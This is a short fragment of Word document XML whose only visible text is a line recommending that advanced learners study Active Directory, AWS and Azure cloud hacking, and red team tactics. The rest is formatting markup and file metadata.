        <w:t xml:space="preserve">For Pro-level → Master </w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active Directory, Cloud Hacking (AWS, Azure)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Red Team TTPs</w:t>
      </w:r>
      <w:r w:rsidRPr="00C77BBB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F04D01" w14:textId="77777777" w:rsidR="001F36B0" w:rsidRDefault="001F36B0"/>
    <w:sectPr w:rsidR="001F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87803"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8D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B0"/>
    <w:rsid w:val="001F36B0"/>
    <w:rsid w:val="00793E0A"/>
    <w:rsid w:val="00C7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7805-8358-444B-913A-C7A76FDC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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-29T18:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-29T18:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>